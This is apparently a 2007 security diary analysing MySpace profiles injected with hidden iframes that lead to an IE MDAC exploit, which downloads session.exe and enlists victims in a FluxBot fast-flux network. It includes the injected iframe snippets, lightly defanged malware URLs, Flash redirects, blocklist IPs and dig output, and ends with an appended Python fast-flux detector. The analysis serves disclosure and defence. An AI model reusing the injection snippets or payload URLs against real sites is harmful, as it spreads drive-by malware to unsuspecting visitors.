Last Updated: 2007-06-29 23:14:38 UTC
by Johannes Ullrich (Version: 3)
UPDATE: Skip down to Section 2007-06-28
CAREFUL! This diary contains links to malicious code!
A number of MySpace profiles include drive-by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.
FluxBot (aka "Fast-Flux") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
A typical excerpt from an infected profile (obfuscated to protect the innocent):
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
<iframe src="http://fafb 4c4c .com/header_03.gif" width=1 height=1></iframe>
The domain used here is of course again served via flux. header_03.gif
<iframe src="http://fafb4c4c .com/routine.php" width=1 height=1></iframe>
Are we there yet? Yup, just one more (patched) Internet Explorer exploit to go. The exploit will install the .exe. For example:
(Warning: live malware URLs visit at your own risk)
http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
Settings for the bot can be found here:
Once it's all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.
A couple of IPs that may be worthwhile to block:
AS13767 | 18.104.22.168
AS15083 | 22.214.171.124
AS25761 | 126.96.36.199
AS25761 | 188.8.131.52
As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger; this is work done by members of our great handler team.
MySpace Phish/Drive-by attack vector propagating Fast Flux network growth
Two primary infection vectors have been observed, providing us with unique insight into the life cycle involved in propagating a fast flux service network. The attack vectors include:
- Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
- Malicious SWF (Flash) image redirection to a phishing page and drive-by browser exploit attempt.
All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )
(The above URL is only a single example of potentially infinite permutations)
Following the above /da3e/index.php link results in a credible-looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:
The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006.
The successful compromise of a Windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe), which is then responsible for attempting to download the additional malicious components necessary to integrate the newly compromised host into a fast flux service network.
The malware stub (session.exe) above attempts to download and execute the following components:
Now back to these Evil Flash File Redirects:
What follows is just a representative sampling of URLs for Flash files hosted on the imageshack.us site which perform one simple action: an ActionScript-based browser redirect to a combined phishing and drive-by exploit page, hosted on the fast flux service network, that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).
All files are identical (same MD5 and SHA1 hash for every file):
The mtime maintained by the Imageshack HTTP server suggests a deployment time of 2007-06-05 -0700.
Decompiling a flash component results in the discovery of that terrible redirect:
Where in the world are Flash files like the above being hosted?
REMOVED >100 URLS ( You get the idea )
Several Hundred MySpace profiles were discovered injected with links to phishing, and it is easy to imagine that many more were affected.
HUNDREDS OF URLS REMOVED
Flux! It's SO easy to miss!
This write-up is not geared to address the more complex overview of what a fast flux service network is (that is forthcoming). Essentially, all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream "mothership" host.
;; ANSWER SECTION:
at6pyss.com. 179 IN A 184.108.40.206 [h220.127.116.11.cable.htsp.cablelynx.com]
at6pyss.com. 179 IN A 18.104.22.168 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com. 179 IN A 22.214.171.124 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com. 179 IN A 126.96.36.199 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com. 179 IN A 188.8.131.52 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com. 179 IN A 184.108.40.206 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com. 179 IN A 220.127.116.11 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com. 179 IN A 18.104.22.168 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com. 179 IN A 22.214.171.124 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com. 179 IN A 126.96.36.199 [cpe-76-80-255-40.socal.res.rr.com]
Check back on the above DNS results; the same goes for any domains referenced above.
The concept of flux may unfold before your very eyes.
at6pyss.com. 172799 IN NS ns1.welcometothechallenge.hk.
at6pyss.com. 172799 IN NS ns1.kanjerida.hk.
at6pyss.com. 172799 IN NS ns1.phudisarida.hk.
at6pyss.com. 172799 IN NS ns1.myheroisyourslove.hk.
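To make the flux indicators visible in the dig output above concrete, here is an added Python example (not code from the diary or the handler team) that parses dig-style A records with bracketed rDNS from two successive lookups and scores the signs described in this section: a TTL under five minutes, many distinct residential-looking IPs, and turnover between polls. The sample input is constructed: the IPs are RFC 5737 documentation addresses and the rDNS names are made up.

```python
import re

# Constructed sample input in the style of the dig output quoted in the diary:
# two successive lookups of one name. IPs and rDNS names are made up.
POLL_1 = """
at6pyss.com. 179 IN A 203.0.113.10 [c-203-0-113-10.hsd1.ut.example-cable.net]
at6pyss.com. 179 IN A 203.0.113.44 [adsl-203-0-113-44.dsl.example-dsl.net]
at6pyss.com. 179 IN A 198.51.100.7 [ppp-198-51-100-7.dsl.example-dsl.net]
"""
POLL_2 = """
at6pyss.com. 179 IN A 203.0.113.10 [c-203-0-113-10.hsd1.ut.example-cable.net]
at6pyss.com. 179 IN A 192.0.2.33 [adsl-192-0-2-33.dsl.example-dsl.net]
at6pyss.com. 179 IN A 192.0.2.120 [cpe-192-0-2-120.res.example-rr.com]
"""
# Benign contrast: a stable, long-TTL record on hosting infrastructure (also constructed).
POLL_STABLE = "shop.example.com. 3600 IN A 192.0.2.1 [web1.example.com]\n"

A_RECORD = re.compile(r"^(\S+)\.\s+(\d+)\s+IN\s+A\s+(\S+)(?:\s+\[(\S+)\])?", re.M)
# rDNS fragments typical of residential broadband, as seen in the diary's dig output
RESIDENTIAL = re.compile(r"\b(dsl|adsl|cable|ppp|cpe|hsd\d|res|dyn|pool)\b", re.I)

def parse_answers(text):
    """Return (ttl, ip, rdns) tuples from dig-style A records with an optional [rdns]."""
    return [(int(ttl), ip, rdns) for _, ttl, ip, rdns in A_RECORD.findall(text)]

def flux_score(polls, ttl_threshold=300):
    """Score fast-flux indicators over successive polls of one hostname; the verdict
    requires at least three of: low TTL, many distinct IPs, churn, residential rDNS."""
    records = [parse_answers(p) for p in polls]
    ip_sets = [{ip for _, ip, _ in r} for r in records]
    ttls = [ttl for r in records for ttl, _, _ in r]
    rdns = [name for r in records for _, _, name in r if name]
    if not ttls:
        raise ValueError("no A records parsed")
    # churn: share of each poll's IPs that were absent from the previous poll
    churn = [len(cur - prev) / len(cur) for prev, cur in zip(ip_sets, ip_sets[1:]) if cur]
    resi = sum(bool(RESIDENTIAL.search(n)) for n in rdns) / len(rdns) if rdns else 0.0
    result = {
        "min_ttl": min(ttls),
        "distinct_ips": len(set().union(*ip_sets)),
        "churn": max(churn, default=0.0),
        "residential_ratio": resi,
    }
    hits = sum([
        result["min_ttl"] <= ttl_threshold,
        result["distinct_ips"] >= 5,
        result["churn"] >= 0.5,
        result["residential_ratio"] >= 0.5,
    ])
    result["fast_flux"] = hits >= 3
    return result
```

Feeding the script real `dig` output collected a few minutes apart is what turns the "check back on the above DNS results" advice into a repeatable check; the thresholds are starting points to tune against your own resolver logs.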